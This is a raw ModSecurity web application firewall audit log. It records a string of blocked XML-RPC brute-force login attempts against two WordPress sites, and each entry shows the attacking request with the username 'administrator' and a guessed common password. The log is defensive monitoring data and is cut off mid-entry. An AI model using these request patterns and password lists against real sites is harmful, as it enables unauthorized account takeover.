[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118260267569 4577 (- - -) Stopwatch2: 1749118260267569 4577; combined=3342, p1=363, p2=2797, p3=0, p4=0, p5=104, sr=77, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7968612b-Z-- --e20a7d5f-A-- [05/Jun/2025:17:12:00 +0700] aEFtcH-K7ToMdu-YSIJSlAAAAAw 103.236.140.4 47000 103.236.140.4 8181 --e20a7d5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e20a7d5f-C-- wp.getUsersBlogs administrator qwerty --e20a7d5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e20a7d5f-E-- --e20a7d5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118320346835 2738 (- - -) Stopwatch2: 1749118320346835 2738; combined=2013, p1=225, p2=1684, p3=0, p4=0, p5=61, sr=51, sw=43, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e20a7d5f-Z-- --30cc217e-A-- [05/Jun/2025:17:13:00 +0700] aEFtrOth7G2xELALzPZXRwAAAMs 103.236.140.4 47148 103.236.140.4 8181 --30cc217e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 237 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --30cc217e-C-- wp.getUsersBlogs administrator administrator@2000 --30cc217e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30cc217e-E-- --30cc217e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (65+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118380371359 4475 (- - -) Stopwatch2: 1749118380371359 4475; combined=3343, p1=362, p2=2812, p3=0, p4=0, p5=99, sr=82, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30cc217e-Z-- --49c65f57-A-- [05/Jun/2025:17:13:30 +0700] aEFtyuth7G2xELALzPZXaAAAANQ 103.236.140.4 47228 103.236.140.4 8181 --49c65f57-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --49c65f57-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminJames@12345 --49c65f57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --49c65f57-E-- --49c65f57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749118410328066 4588 (- - -) Stopwatch2: 1749118410328066 4588; combined=3641, p1=380, p2=3041, p3=0, p4=0, p5=155, sr=98, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49c65f57-Z-- --e420ee41-A-- [05/Jun/2025:17:14:00 +0700] aEFt6Oth7G2xELALzPZXeQAAANU 103.236.140.4 47266 103.236.140.4 8181 --e420ee41-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e420ee41-C-- wp.getUsersBlogs administrator Marketing2014 --e420ee41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e420ee41-E-- --e420ee41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (43+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118440323554 4325 (- - -) Stopwatch2: 1749118440323554 4325; combined=3350, p1=342, p2=2843, p3=0, p4=0, p5=96, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e420ee41-Z-- --82bd3b5f-A-- [05/Jun/2025:17:15:01 +0700] aEFuJeth7G2xELALzPZXtAAAAMg 103.236.140.4 47468 103.236.140.4 8181 --82bd3b5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --82bd3b5f-C-- wp.getUsersBlogs administrator Admin@321 --82bd3b5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82bd3b5f-E-- --82bd3b5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (87+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118501078615 5297 (- - -) Stopwatch2: 1749118501078615 5297; combined=3807, p1=452, p2=3185, p3=0, p4=0, p5=100, sr=99, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82bd3b5f-Z-- --e2938318-A-- [05/Jun/2025:17:16:01 +0700] aEFuYX-K7ToMdu-YSIJS5wAAABQ 103.236.140.4 47634 103.236.140.4 8181 --e2938318-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e2938318-C-- wp.getUsersBlogs administrator 1234!@#$ --e2938318-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2938318-E-- --e2938318-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (73+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118561171853 5387 (- - -) Stopwatch2: 1749118561171853 5387; combined=3818, p1=458, p2=3161, p3=0, p4=0, p5=114, sr=98, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2938318-Z-- --04f0ef41-A-- [05/Jun/2025:17:17:01 +0700] aEFuneth7G2xELALzPZX6wAAANE 103.236.140.4 47760 103.236.140.4 8181 --04f0ef41-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --04f0ef41-C-- wp.getUsersBlogs administrator webadmin --04f0ef41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04f0ef41-E-- --04f0ef41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (49+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118621240927 5276 (- - -) Stopwatch2: 1749118621240927 5276; combined=3757, p1=486, p2=3104, p3=0, p4=0, p5=98, sr=117, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04f0ef41-Z-- --5a8f3f7b-A-- [05/Jun/2025:17:17:29 +0700] aEFuuSrHpfaS2Cuwh8UFugAAAEU 103.236.140.4 47856 103.236.140.4 8181 --5a8f3f7b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5a8f3f7b-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehantix159 --5a8f3f7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a8f3f7b-E-- --5a8f3f7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749118649263567 4459 (- - -) Stopwatch2: 1749118649263567 4459; combined=3453, p1=370, p2=2913, p3=0, p4=0, p5=100, sr=82, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a8f3f7b-Z-- --73ff9c18-A-- [05/Jun/2025:17:18:02 +0700] aEFu2lwdJdhOudw5hdz5pgAAAJA 103.236.140.4 47948 103.236.140.4 8181 --73ff9c18-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --73ff9c18-C-- wp.getUsersBlogs administrator security --73ff9c18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73ff9c18-E-- --73ff9c18-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (86+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118682532393 5451 (- - -) Stopwatch2: 1749118682532393 5451; combined=3858, p1=460, p2=3218, p3=0, p4=0, p5=106, sr=90, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73ff9c18-Z-- --e7a46c32-A-- [05/Jun/2025:17:19:02 +0700] aEFvFirHpfaS2Cuwh8UFvQAAAEI 103.236.140.4 48048 103.236.140.4 8181 --e7a46c32-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e7a46c32-C-- wp.getUsersBlogs administrator admin520 --e7a46c32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7a46c32-E-- --e7a46c32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118742048858 5275 (- - -) Stopwatch2: 1749118742048858 5275; combined=3794, p1=506, p2=3114, p3=0, p4=0, p5=102, sr=92, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7a46c32-Z-- --d16f2b11-A-- [05/Jun/2025:17:20:12 +0700] aEFvXFwdJdhOudw5hdz6GQAAAJA 103.236.140.4 48228 103.236.140.4 8181 --d16f2b11-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d16f2b11-C-- wp.getUsersBlogs administrator 1235698 --d16f2b11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d16f2b11-E-- --d16f2b11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (78+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118812162158 5422 (- - -) Stopwatch2: 1749118812162158 5422; combined=3750, p1=464, p2=3117, p3=0, p4=0, p5=100, sr=93, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d16f2b11-Z-- --ded99d1d-A-- [05/Jun/2025:17:21:12 +0700] aEFvmOth7G2xELALzPZYEgAAAMk 103.236.140.4 48330 103.236.140.4 8181 --ded99d1d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --ded99d1d-C-- wp.getUsersBlogs administrator !@#123qwe --ded99d1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ded99d1d-E-- --ded99d1d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (41+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118872973263 5523 (- - -) Stopwatch2: 1749118872973263 5523; combined=3858, p1=459, p2=3223, p3=0, p4=0, p5=104, sr=93, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ded99d1d-Z-- --5d6a6749-A-- [05/Jun/2025:17:22:12 +0700] aEFv1FwdJdhOudw5hdz6YgAAAIw 103.236.140.4 48436 103.236.140.4 8181 --5d6a6749-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --5d6a6749-C-- wp.getUsersBlogs administrator superman --5d6a6749-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d6a6749-E-- --5d6a6749-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (45+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118932230692 4460 (- - -) Stopwatch2: 1749118932230692 4460; combined=3355, p1=341, p2=2820, p3=0, p4=0, p5=110, sr=81, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d6a6749-Z-- --8050644e-A-- [05/Jun/2025:17:23:19 +0700] aEFwF-th7G2xELALzPZYTgAAAMI 103.236.140.4 48580 103.236.140.4 8181 --8050644e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --8050644e-C-- wp.getUsersBlogs administrator hellokitty --8050644e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8050644e-E-- --8050644e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (65+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118999776450 4959 (- - -) Stopwatch2: 1749118999776450 4959; combined=3638, p1=401, p2=3064, p3=0, p4=0, p5=102, sr=81, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8050644e-Z-- --684ecd32-A-- [05/Jun/2025:17:24:22 +0700] aEFwVuth7G2xELALzPZYdAAAAMY 103.236.140.4 48710 103.236.140.4 8181 --684ecd32-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --684ecd32-C-- wp.getUsersBlogs administrator 12345a --684ecd32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --684ecd32-E-- --684ecd32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (57+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119062105580 4684 (- - -) Stopwatch2: 1749119062105580 4684; combined=3476, p1=396, p2=2911, p3=0, p4=0, p5=100, sr=83, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --684ecd32-Z-- --c908c527-A-- [05/Jun/2025:17:25:22 +0700] aEFwklwdJdhOudw5hdz6kgAAAIw 103.236.140.4 48900 103.236.140.4 8181 --c908c527-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http 